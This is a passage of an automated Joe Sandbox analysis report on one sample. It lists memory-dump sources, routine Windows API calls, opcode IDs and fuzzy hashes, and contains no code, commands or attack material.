                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: LoadString
                          • String ID:
                          • API String ID: 2948472770-0
                          • Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                          • Instruction ID: b2b05a2a7eb15132321ef81a69e5a047251b61ae9b0b50643d2da887e6016b1f
                          • Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                          • Instruction Fuzzy Hash: 14114971F0C64186EA42BF16A980169F7A1BB8AFC0F544535DA1EE3B20FE7CE5418344
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: ErrorFileLastPointer
                          • String ID:
                          • API String ID: 2976181284-0
                          • Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                          • Instruction ID: aeec7b88bb653e333aba585a407803c41648607d0f715c0fbe3fce553a450036
                          • Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                          • Instruction Fuzzy Hash: B311A225E0C64181EB62FB25E980279A260FB46BB4F544331DA7D826E4EF3CD582C300
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: Item$RectText$ClientWindowswprintf
                          • String ID:
                          • API String ID: 402765569-0
                          • Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                          • Instruction ID: ef57ac05a55aa9543d219f752d942e76b8d2eb4bbf147314635f15ec31934ec7
                          • Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                          • Instruction Fuzzy Hash: DD012124E0D64A41FF5BB752A8582B9D7916F8778CF188435D84DC67DAFE2CE884C340
                          APIs
                          • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF64D33EBAD,?,?,?,?,00007FF64D335752,?,?,?,00007FF64D3356DE), ref: 00007FF64D33EB5C
                          • GetProcessAffinityMask.KERNEL32 ref: 00007FF64D33EB6F
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: Process$AffinityCurrentMask
                          • String ID:
                          • API String ID: 1231390398-0
                          • Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                          • Instruction ID: 69889235bfdf95df8162ee5352116f615b5b11b2c275dbb42e07f51fbe87e768
                          • Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                          • Instruction Fuzzy Hash: 9EE02B71F1C58A82DF1ABF55C4504EDB392BFC9B40B849135E60BC3A14FE2CE1458B00
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                          • String ID:
                          • API String ID: 1173176844-0
                          • Opcode ID: c507040392a2377e4895e65205c3b95c5fe2146e3485fc393c80d7c2ffdcaf26
                          • Instruction ID: f676647c1ac6f8ec6886947822870d604b21b375abe33a561fd0869c3afbf239
                          • Opcode Fuzzy Hash: c507040392a2377e4895e65205c3b95c5fe2146e3485fc393c80d7c2ffdcaf26
                          • Instruction Fuzzy Hash: 1BE01249E0E10741FD5BB27219361B680400F1B3B4E5C5730DE3EC56C3BD5CB591C250
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: ErrorLanguagesLastPreferredRestoreThread
                          • String ID:
                          • API String ID: 588628887-0
                          • Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                          • Instruction ID: 6c6abf336bd28e4ff242ae02a8d9ed5b893e1ef03703c3e727606e3c446c4cba
                          • Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                          • Instruction Fuzzy Hash: 74E0EC60E4D50346FF1BBBB2A8652B893D1AF9BB55B045434D90EC6292FE2CB4968610
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 3668304517-0
                          • Opcode ID: de6ed7916833eab16265dc8adf0133c5cc9bb4ef2c6b2401519f57c94907b3cc
                          • Instruction ID: ef164e06fcd9ab7e78fd40055e4dbe72f1228d1d4b63d292e53fb25f55024037
                          • Opcode Fuzzy Hash: de6ed7916833eab16265dc8adf0133c5cc9bb4ef2c6b2401519f57c94907b3cc
                          • Instruction Fuzzy Hash: 22D1B662F0C68156EF2ABB2595402FDE7A5FB06B88F040439CB5D877A1EF3CE4658742
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: CompareString_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 1017591355-0
                          • Opcode ID: 60054bf23714923d6cf658706c57d8570bb270d346a0b8b9a17da1f048c8cd6a
                          • Instruction ID: e82fc7e24c6f628734507cad09c7f04970303efef121e1439447a27ec1308d2b
                          • Opcode Fuzzy Hash: 60054bf23714923d6cf658706c57d8570bb270d346a0b8b9a17da1f048c8cd6a
                          • Instruction Fuzzy Hash: 61610451E0C64781FA6ABA25861C27EE2D1AF43BE5F144531EE4DC7ED6FE7CE8818200
                          APIs
                            • Part of subcall function 00007FF64D33E948: ReleaseSemaphore.KERNEL32 ref: 00007FF64D33E974
                            • Part of subcall function 00007FF64D33E948: FindCloseChangeNotification.KERNELBASE ref: 00007FF64D33E993
                            • Part of subcall function 00007FF64D33E948: DeleteCriticalSection.KERNEL32 ref: 00007FF64D33E9AA
                            • Part of subcall function 00007FF64D33E948: CloseHandle.KERNEL32 ref: 00007FF64D33E9B7
                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D341ACB
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 1624603282-0
                          • Opcode ID: 7dd4c45c898d1fc3c125baa466fe89dc4e149350440c7c1a3107608e29ab7dcf
                          • Instruction ID: 24c852d4e7b7eb0d016149a9e0adabb9b5b42389d0418b5a0f60e5204577605e
                          • Opcode Fuzzy Hash: 7dd4c45c898d1fc3c125baa466fe89dc4e149350440c7c1a3107608e29ab7dcf
                          • Instruction Fuzzy Hash: 7A61A062F1AA9592EE09FB65D5540BCB3A5FF42BD0B544232D72D87AC1EF2DE8708300
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 3668304517-0
                          • Opcode ID: 2f83e6df9ab7224275e60499f17cd5cc3bb417b2ed89fe698c193226d29eb46c
                          • Instruction ID: adb472bcc2ed376ee5559cf6c23884e821b93c5937ba7239acf0ac4029873d69
                          • Opcode Fuzzy Hash: 2f83e6df9ab7224275e60499f17cd5cc3bb417b2ed89fe698c193226d29eb46c
                          • Instruction Fuzzy Hash: 8E510562E0C64240FE12BB25D4453E9A791FB87BD8F484136EE4D97796EE3DE485C380
                          APIs
                            • Part of subcall function 00007FF64D333EC8: FindClose.KERNELBASE(?,?,00000000,00007FF64D340811), ref: 00007FF64D333EFD
                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D32E993
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 1011579015-0
                          • Opcode ID: 7ccb79097edba5c9ff264a6ea3acda2e11d4279ec26602cbe1bb149cda34522a
                          • Instruction ID: d51e2829da01510f14a6d9dfb63120bb1bab9c60f5d586f72426f9a47893fd04
                          • Opcode Fuzzy Hash: 7ccb79097edba5c9ff264a6ea3acda2e11d4279ec26602cbe1bb149cda34522a
                          • Instruction Fuzzy Hash: 01516122E0C68581FB62FF25D4453BDA3A1FB86B88F440136EA9D977A5EF2CD441C750
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 3668304517-0
                          • Opcode ID: c006a20c94347bfb99d4e52a49aa348bdad6c5331fec93181297fc91a88f23fb
                          • Instruction ID: 8c41b301c255e55b8750d186229dc140cbedfcfb4bab6330707296e62920d726
                          • Opcode Fuzzy Hash: c006a20c94347bfb99d4e52a49aa348bdad6c5331fec93181297fc91a88f23fb
                          • Instruction Fuzzy Hash: 6D41D662F1CA9142EA15BB17AA40379E291FB45BC0F448535EE5C8BF5AEF3CD8918340
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 3668304517-0
                          • Opcode ID: 79c0921cd87fe934e762e48f5845e8be846b4b6500caa7e1addc831544741880
                          • Instruction ID: de1c9adeb720b2edd4673e6f319218d503c153ff924e58c5ae697ea31b2db13a
                          • Opcode Fuzzy Hash: 79c0921cd87fe934e762e48f5845e8be846b4b6500caa7e1addc831544741880
                          • Instruction Fuzzy Hash: 19410762E0CB0581EF12BB25E645379A3A1EB86BD8F145134EA4E87B99EF3DE440C740
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: HandleModule$AddressFreeLibraryProc
                          • String ID:
                          • API String ID: 3947729631-0
                          • Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                          • Instruction ID: bb990afc0a5d97c2fc3c1844987a0e240e8563d93106f576847dc934eda12070
                          • Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                          • Instruction Fuzzy Hash: 1C41B622E1D602C2FB26FB11B460278A3A1AF56B80F485476EA0DC76E1FF3DE845C741
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                          • String ID:
                          • API String ID: 680105476-0
                          • Opcode ID: 5eba3157de67c00c95e8addb1899600017969f59a743ef38de321e8ce7b4907f
                          • Instruction ID: ca003f0dadd001ae73c48c7126d99dc2f4db0d9310db86f7fd97feb91e64d91c
                          • Opcode Fuzzy Hash: 5eba3157de67c00c95e8addb1899600017969f59a743ef38de321e8ce7b4907f
                          • Instruction Fuzzy Hash: 8821B522E0C75185EA15BF91A5402B9A291FB06BF4F680B30DF3D87BC1EE7CE9518380
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 3668304517-0
                          • Opcode ID: 8c60347c2bfbbab9dfa70ff2fac3311f61486aebf990572e493ef76669a070d3
                          • Instruction ID: b58fa31ea25fe665ff6156e24c58819891a2c5949fd43e23bd475838a12de85a
                          • Opcode Fuzzy Hash: 8c60347c2bfbbab9dfa70ff2fac3311f61486aebf990572e493ef76669a070d3
                          • Instruction Fuzzy Hash: 0B21A226F1D58262EA0AFB21D5543FCA350FB46788F944431E71D87AA2EF3CE4A4C341
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 3668304517-0
                          • Opcode ID: 454a1fcff6e1850c8b97cdd7684a735fd34d2cefc8bc4c1965818da2daadb151
                          • Instruction ID: fb63ff33e1586cacbde522e388c843f68a6a6357909c5963b479d977056ac58d
                          • Opcode Fuzzy Hash: 454a1fcff6e1850c8b97cdd7684a735fd34d2cefc8bc4c1965818da2daadb151
                          • Instruction Fuzzy Hash: F50184A2E1CA8581EE12BB28E84526DB361FF8B794F805235E69C47BA5EF6CD1408705
                          APIs
                            • Part of subcall function 00007FF64D351604: GetModuleHandleW.KERNEL32(?,?,?,00007FF64D351573,?,?,?,00007FF64D35192A), ref: 00007FF64D35162B
                          • DloadProtectSection.DELAYIMP ref: 00007FF64D3515C9
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: DloadHandleModuleProtectSection
                          • String ID:
                          • API String ID: 2883838935-0
                          • Opcode ID: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
                          • Instruction ID: a56363b090b1006e3ddaaaaf8bb59dcc613ab3920052eac4df916d5885df5be1
                          • Opcode Fuzzy Hash: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
                          • Instruction Fuzzy Hash: 36118AA0D0D50781FB67BB55A851374A3E0AF5A38DF140435E90EC66A1FF3CAD95C701
                          APIs
                            • Part of subcall function 00007FF64D3340BC: FindFirstFileW.KERNELBASE ref: 00007FF64D33410B
                            • Part of subcall function 00007FF64D3340BC: FindFirstFileW.KERNELBASE ref: 00007FF64D33415E
                            • Part of subcall function 00007FF64D3340BC: GetLastError.KERNEL32 ref: 00007FF64D3341AF
                          • FindClose.KERNELBASE(?,?,00000000,00007FF64D340811), ref: 00007FF64D333EFD
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
